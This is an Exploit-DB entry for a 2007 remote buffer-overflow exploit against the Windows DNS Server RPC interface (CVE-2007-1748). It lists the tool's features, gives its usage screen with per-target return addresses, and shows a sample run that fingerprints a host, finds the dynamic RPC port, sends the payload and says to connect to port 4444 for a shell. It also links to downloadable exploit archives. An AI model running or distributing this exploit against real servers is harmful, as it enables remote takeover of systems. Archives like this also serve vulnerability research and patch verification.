Microsoft Windows - DNS RPC Remote Buffer Overflow (2)

EDB-ID:

3746

CVE:

2007-1748

EDB Verified:

Author:

Andres Tarasco

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2007-04-18

Vulnerable App: 
  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip 
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services